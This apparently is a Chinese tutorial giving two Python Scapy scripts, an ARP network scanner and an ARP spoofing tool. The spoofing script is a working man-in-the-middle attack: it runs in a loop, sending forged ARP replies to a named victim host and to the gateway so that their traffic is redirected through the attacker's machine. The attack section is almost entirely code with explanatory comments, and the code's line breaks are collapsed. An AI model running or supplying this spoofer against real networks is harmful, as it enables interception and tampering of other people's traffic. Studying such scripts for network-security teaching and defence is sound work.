Python Scapy库实现ARP扫描和ARP欺骗

 ARP扫描：检测指定IP网段中哪些主机是在线的，并获取它们的MAC地址

from scapy.all import *  
import argparse  
import threading  
import time  
import logging  # 解析CIDR格式的网段，并返回IP地址列表  
# >接受一个CIDR格式的网段作为输入（例如192.168.1.0/24）。
# >将网段解析为IP地址列表。
# >通过子网掩码长度计算IP地址范围，并生成该网段内所有可能的IP地址。
def Parse_IP(targets):  """  将CIDR格式的网段字符串转换为IP地址列表。  :param targets: CIDR格式的网段字符串，例如"192.168.1.1/24"  :return: IP地址列表  """  _split = targets.split('/')  # 按斜杠分割字符串，得到网络地址和子网掩码长度  first_ip = _split[0]  # 获取网络地址  ip_split = first_ip.split('.')  # 按点分割网络地址，得到各部分的数字  # 生成IP地址范围  ipv4 = range(int(ip_split[3]), int(ip_split[3]) + (2 ** (32 - int(_split[1]))))  # 构建IP地址列表  addr = [f"{ip_split[0]}.{ip_split[1]}.{ip_split[2]}.{p}" for p in ipv4]  return addr  # 使用ARP协议扫描指定IP地址，查找在线设备  
# >接受一个IP地址作为输入。
# >使用Scapy发送一个ARP请求到这个IP地址，并等待回复
# >如果收到ARP回复，则提取并打印出该IP地址对应的MAC地址
def ARP_Scan(address):  """  发送ARP请求到指定IP地址，并查找在线设备的MAC地址。  :param address: 要扫描的IP地址  """  try:  # 发送ARP请求并等待回复，超时时间为5秒  ret = sr1(ARP(pdst=address), timeout=5, verbose=False)  # 如果收到回复  if ret:  # 检查回复是否包含ARP层，并且操作码是否为2（表示ARP回复）  if ret.haslayer('ARP') and ret.fields['op'] == 2:  # 打印IP地址和对应的MAC地址  print('[+] IP地址: %-13s ==> MAC地址: %-15s' %(ret.fields['psrc'], ret.fields['hwsrc']))  except Exception as e:  logging.error(f"An error occurred while scanning IP {address}: {e}")  exit(1)  # 程序入口 
# >argparse模块解析命令行参数
# >如果提供了扫描网段参数，则调用Parse_IP函数解析网段，获取IP地址列表
# >每个IP地址创建一个新的线程来执行ARP_Scan函数
if __name__ == "__main__":  # 设置Scapy的日志记录级别为ERROR，以减少不必要的输出  logging.getLogger("scapy.runtime").setLevel(logging.ERROR)  # 创建命令行参数解析器  parser = argparse.ArgumentParser()  parser.add_argument("-s", "--scan", dest="scan", help="输入一个扫描网段")  # 解析命令行参数  args = parser.parse_args()  # 如果提供了扫描网段参数  if args.scan:  # 解析网段并获取IP地址列表  addr_list = Parse_IP(args.scan)  # 创建线程列表  threads = []  # 对每个IP地址启动一个新的扫描线程  for item in addr_list:  t = threading.Thread(target=ARP_Scan, args=(item,))  threads.append(t)  t.start()  # 等待所有线程完成  for item in threads:  item.join()  else:   parser.print_help()

ARP欺骗：通过伪造ARP响应来欺骗目标计算机和网关，使它们相信它们正在与对方通信，而实际上所有的通信都经过了攻击者的机器

from scapy.all import *  
import argparse  
import threading, time  
import logging  # 定义SendPayload函数，用于发送ARP欺骗的数据包  
def SendPayload(Interface, srcMac, tgtMac, gateWayMac, gatewayIP, tgtIP):  # 打印目标MAC地址和目标IP地址，以及发送的数据包数量  print("[+] 目标MAC: {} 目标IP: {} 发送: 2 packets".format(tgtMac, tgtIP))  # 生成并发送第一个ARP数据包，伪造网关的IP和MAC地址，欺骗目标计算机  # 使目标计算机认为网关的MAC地址是攻击者的MAC地址  sendp(  Ether(src=srcMac, dst=tgtMac) /  # 以攻击者的MAC地址作为源MAC，目标计算机的MAC地址作为目的MAC  ARP(hwsrc=srcMac, psrc=gatewayIP, hwdst=tgtMac, pdst=tgtIP, op=2),  # ARP数据包，其中op=2表示ARP回复  iface=Interface)  # 生成并发送第二个ARP数据包，伪造目标计算机的IP和MAC地址，欺骗网关  # 使网关认为目标计算机的MAC地址是攻击者的MAC地址  sendp(  Ether(src=srcMac, dst=gateWayMac) /  # 以攻击者的MAC地址作为源MAC，网关的MAC地址作为目的MAC  ARP(hwsrc=srcMac, psrc=tgtIP, hwdst=gateWayMac, pdst=gatewayIP, op=2), iface=Interface)  if __name__ == "__main__":  # 创建命令行参数解析器  parser = argparse.ArgumentParser()  # 接口名 parser.add_argument("-i", "--interface", dest="interface", help="输入接口名")  # 网关地址parser.add_argument("-g", "--gateway", dest="gateway", help="输入网关地址")  # 目标主机地址  parser.add_argument("-t", "--target", dest="target", help="输入被害主机地址")  # 解析命令行参数  args = parser.parse_args()  if args.gateway and args.target:  # 通过接口名称获取本机的MAC地址  srcMac = get_if_hwaddr(args.interface)  # 通过目标主机的IP地址获取其MAC地址  tgtMac = getmacbyip(args.target)  # 通过网关的IP地址获取其MAC地址  gatewayMac = getmacbyip(args.gateway)  # 持续发送ARP欺骗数据包  while True:  # 创建一个新线程来发送ARP欺骗数据包  t = threading.Thread(target=SendPayload, args=(args.interface, srcMac, tgtMac, gatewayMac, args.gateway, args.target))  t.start()  t.join()   time.sleep(1)  else:  parser.print_help()